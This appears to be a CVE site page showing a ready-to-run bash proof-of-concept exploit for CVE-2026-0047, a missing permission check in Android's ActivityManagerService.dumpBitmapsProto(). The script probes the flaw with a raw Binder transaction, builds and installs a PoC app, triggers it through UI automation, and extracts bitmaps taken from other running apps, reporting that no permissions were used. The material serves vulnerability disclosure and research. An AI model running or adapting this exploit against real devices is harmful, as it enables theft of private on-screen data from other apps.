5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-0047
README.md
Rendering markdown...
POC / exploit.sh SH
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env bash
# ──────────────────────────────────────────────────────────────────────────────
# CVE-2026-0047 — Single-Shot PoC Exploit Script
#
# Exploits the missing permission check in ActivityManagerService.dumpBitmapsProto()
# on Android 16 QPR2 Beta (Baklava) to steal bitmaps from all running apps.
#
# Prerequisites:
#   - Android SDK with emulator, platform-tools, and build-tools installed
#   - Java 17+
#   - A running Baklava emulator (see setup below) or ADB-connected device
#     with security patch < 2026-03-01
#
# Emulator setup (one-time):
#   sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a"
#   avdmanager create avd -n baklava -k "system-images;android-Baklava;google_apis;arm64-v8a"
#   emulator -avd baklava &
#
# Usage:
#   chmod +x exploit.sh
#   ./exploit.sh                    # build, install, exploit, pull results
#   ./exploit.sh --skip-build       # skip build, just run exploit on device
#   ./exploit.sh --setup-emulator   # create and boot emulator first
# ──────────────────────────────────────────────────────────────────────────────
set -euo pipefail

RED='\033[0;31m'
GRN='\033[0;32m'
CYN='\033[0;36m'
YLW='\033[1;33m'
RST='\033[0m'

log()  { echo -e "${CYN}[*]${RST} $1"; }
ok()   { echo -e "${GRN}[+]${RST} $1"; }
warn() { echo -e "${YLW}[!]${RST} $1"; }
err()  { echo -e "${RED}[-]${RST} $1"; }
die()  { err "$1"; exit 1; }

SKIP_BUILD=false
SETUP_EMU=false
OUTPUT_DIR="./stolen_bitmaps"

for arg in "$@"; do
    case "$arg" in
        --skip-build)      SKIP_BUILD=true ;;
        --setup-emulator)  SETUP_EMU=true ;;
        *)                 die "Unknown argument: $arg" ;;
    esac
done

# ── Emulator setup ──────────────────────────────────────────────────────────
if $SETUP_EMU; then
    log "Setting up Baklava emulator..."
    echo ""
    warn "Downloading Android 16 QPR2 Beta system image (~2GB)..."
    sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a" || \
        die "Failed to download system image. Run: sdkmanager --list | grep Baklava"

    log "Creating AVD 'baklava-vuln'..."
    echo "no" | avdmanager create avd \
        -n baklava-vuln \
        -k "system-images;android-Baklava;google_apis;arm64-v8a" \
        --force

    log "Booting emulator..."
    emulator -avd baklava-vuln -no-snapshot-load -gpu swiftshader_indirect &
    EMU_PID=$!

    log "Waiting for emulator to boot (this takes 1-3 minutes)..."
    adb wait-for-device
    while [ "$(adb shell getprop sys.boot_completed 2>/dev/null)" != "1" ]; do
        sleep 2
    done
    ok "Emulator booted (PID $EMU_PID)"
    echo ""
fi

# ── Preflight checks ────────────────────────────────────────────────────────
log "Checking prerequisites..."

command -v adb >/dev/null 2>&1 || die "adb not found. Install Android SDK platform-tools."

adb get-state >/dev/null 2>&1 || die "No device connected. Boot an emulator first:
    sdkmanager 'system-images;android-Baklava;google_apis;arm64-v8a'
    avdmanager create avd -n baklava -k 'system-images;android-Baklava;google_apis;arm64-v8a'
    emulator -avd baklava &"

PATCH_LEVEL=$(adb shell getprop ro.build.version.security_patch 2>/dev/null)
BUILD=$(adb shell getprop ro.build.display.id 2>/dev/null)
SDK=$(adb shell getprop ro.build.version.sdk 2>/dev/null)

echo ""
echo "  Device:       $(adb shell getprop ro.product.model)"
echo "  Build:        $BUILD"
echo "  SDK:          $SDK"
echo "  Patch level:  $PATCH_LEVEL"
echo ""

if [[ "$PATCH_LEVEL" > "2026-02-28" ]] && [[ "$PATCH_LEVEL" != "2025"* ]]; then
    warn "Patch level $PATCH_LEVEL >= 2026-03-01 — device may be patched."
    warn "The exploit will still run but expect SecurityException."
    echo ""
fi

# No hidden_api_policy needed — raw Binder transact bypasses hidden API entirely
echo ""

# ── Phase 1: Raw Binder probe ───────────────────────────────────────────────
log "Phase 1: Raw Binder transaction probe..."
log "Sending transaction #117 (dumpBitmapsProto) to IActivityManager..."
echo ""

PROBE=$(adb shell "service call activity 117" 2>&1)

if echo "$PROBE" | grep -qi "SecurityException\|Permission.Denial"; then
    err "PATCHED: SecurityException returned."
    err "This device enforces DUMP permission on dumpBitmapsProto()."
    echo ""
    echo "$PROBE"
    exit 0
fi

if echo "$PROBE" | grep -qi "dumpBitmapsProto\|ActivityManagerService\|NullPointerException"; then
    ok "METHOD REACHED — no SecurityException!"
    ok "CVE-2026-0047 confirmed: dumpBitmapsProto() has no permission check."
elif echo "$PROBE" | grep -q "fffffffc"; then
    ok "Binder returned error code but NO SecurityException."
    ok "Method was dispatched without permission check."
else
    warn "Unexpected response. Continuing with Phase 2..."
fi
echo ""

# ── Phase 2: Build the PoC app ──────────────────────────────────────────────
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
APK_PATH="$SCRIPT_DIR/app/build/outputs/apk/debug/app-debug.apk"

if ! $SKIP_BUILD; then
    if [ -f "$SCRIPT_DIR/gradlew" ]; then
        log "Phase 2: Building PoC APK..."
        cd "$SCRIPT_DIR"
        chmod +x gradlew
        ./gradlew :app:assembleDebug -q 2>&1 | tail -3
        ok "APK built: $APK_PATH"
    else
        die "gradlew not found in $SCRIPT_DIR. Run from the PoC project root."
    fi
else
    log "Phase 2: Skipping build (--skip-build)"
    [ -f "$APK_PATH" ] || die "APK not found at $APK_PATH. Run without --skip-build first."
fi
echo ""

# ── Phase 3: Install and exploit ────────────────────────────────────────────
log "Phase 3: Installing PoC app..."
adb install -r "$APK_PATH" 2>&1 | grep -v "^$"
ok "Installed com.poc.cve20260047"
echo ""

log "Opening Settings app (target with visible UI bitmaps)..."
adb shell am start -n com.android.settings/.Settings >/dev/null 2>&1
sleep 2

log "Launching PoC exploit..."
adb shell am start -n com.poc.cve20260047/.MainActivity >/dev/null 2>&1
sleep 2

# Find the exploit button and tap it
log "Triggering dumpBitmapsProto() exploit via UI..."
adb shell uiautomator dump /sdcard/poc_ui.xml >/dev/null 2>&1
BOUNDS=$(adb shell cat /sdcard/poc_ui.xml 2>/dev/null | \
    grep -o 'resource-id="com.poc.cve20260047:id/btnRealCve"[^>]*' | \
    grep -o 'bounds="\[[0-9]*,[0-9]*\]\[[0-9]*,[0-9]*\]"' | \
    grep -o '\[.*\]' || true)

if [ -n "$BOUNDS" ]; then
    X1=$(echo "$BOUNDS" | sed 's/\[\([0-9]*\),.*/\1/')
    Y1=$(echo "$BOUNDS" | sed 's/\[[0-9]*,\([0-9]*\)\].*/\1/')
    X2=$(echo "$BOUNDS" | sed 's/.*\[\([0-9]*\),.*/\1/')
    Y2=$(echo "$BOUNDS" | sed 's/.*\[[0-9]*,\([0-9]*\)\]/\1/')
    TX=$(( (X1 + X2) / 2 ))
    TY=$(( (Y1 + Y2) / 2 ))
    adb shell input tap "$TX" "$TY"
    ok "Tapped exploit button at ($TX, $TY)"
else
    warn "Could not find button via uiautomator, trying default coordinates..."
    adb shell input tap 540 736
fi

log "Waiting for exploit to complete (up to 20 seconds)..."
sleep 20
echo ""

# ── Phase 4: Extract results ────────────────────────────────────────────────
log "Phase 4: Extracting stolen bitmaps..."
mkdir -p "$OUTPUT_DIR"

FILE_COUNT=$(adb shell "run-as com.poc.cve20260047 ls files/ 2>/dev/null" | grep -c "stolen_bitmap_" || true)
BIN_SIZE=$(adb shell "run-as com.poc.cve20260047 stat -c%s files/stolen_bitmaps.bin 2>/dev/null" || echo "0")

if [ "$FILE_COUNT" -gt 0 ] 2>/dev/null; then
    ok "Found $FILE_COUNT stolen PNG files on device!"
    echo ""

    for f in $(adb shell "run-as com.poc.cve20260047 ls files/" 2>/dev/null | grep "stolen_bitmap_.*\.png"); do
        f=$(echo "$f" | tr -d '\r')
        adb shell "run-as com.poc.cve20260047 cat files/$f" > "$OUTPUT_DIR/$f" 2>/dev/null
    done

    adb shell "run-as com.poc.cve20260047 cat files/stolen_bitmaps.bin" > "$OUTPUT_DIR/raw_protobuf.bin" 2>/dev/null

    VALID=0
    for png in "$OUTPUT_DIR"/stolen_bitmap_*.png; do
        if file "$png" 2>/dev/null | grep -q "PNG image"; then
            VALID=$((VALID + 1))
        fi
    done

    echo ""
    echo "  ══════════════════════════════════════════"
    echo "  CVE-2026-0047 EXPLOIT RESULTS"
    echo "  ══════════════════════════════════════════"
    echo ""
    echo "  Device:           $(adb shell getprop ro.product.model)"
    echo "  Build:            $BUILD"
    echo "  Patch level:      $PATCH_LEVEL"
    echo ""
    echo "  Raw protobuf:     $BIN_SIZE bytes"
    echo "  PNG files:        $FILE_COUNT extracted"
    echo "  Valid PNGs:       $VALID confirmed"
    echo "  Output dir:       $OUTPUT_DIR/"
    echo ""
    echo "  Permissions used: NONE"
    echo ""
    echo "  ══════════════════════════════════════════"
    echo ""

    ok "Stolen bitmaps saved to $OUTPUT_DIR/"
    log "View them with: open $OUTPUT_DIR/ (macOS) or xdg-open $OUTPUT_DIR/ (Linux)"
    echo ""

    ls -lhS "$OUTPUT_DIR"/stolen_bitmap_*.png 2>/dev/null | head -10
    echo ""

else
    warn "No bitmap files found. Checking logcat for exploit status..."
    echo ""
    adb logcat -d | grep -i "CVE-PoC\|dumpBitmap\|SecurityException" | tail -20
    echo ""

    # Take screenshot of result
    adb shell screencap -p /sdcard/poc_result.png 2>/dev/null
    adb pull /sdcard/poc_result.png "$OUTPUT_DIR/exploit_screenshot.png" 2>/dev/null
    log "Screenshot saved to $OUTPUT_DIR/exploit_screenshot.png"
fi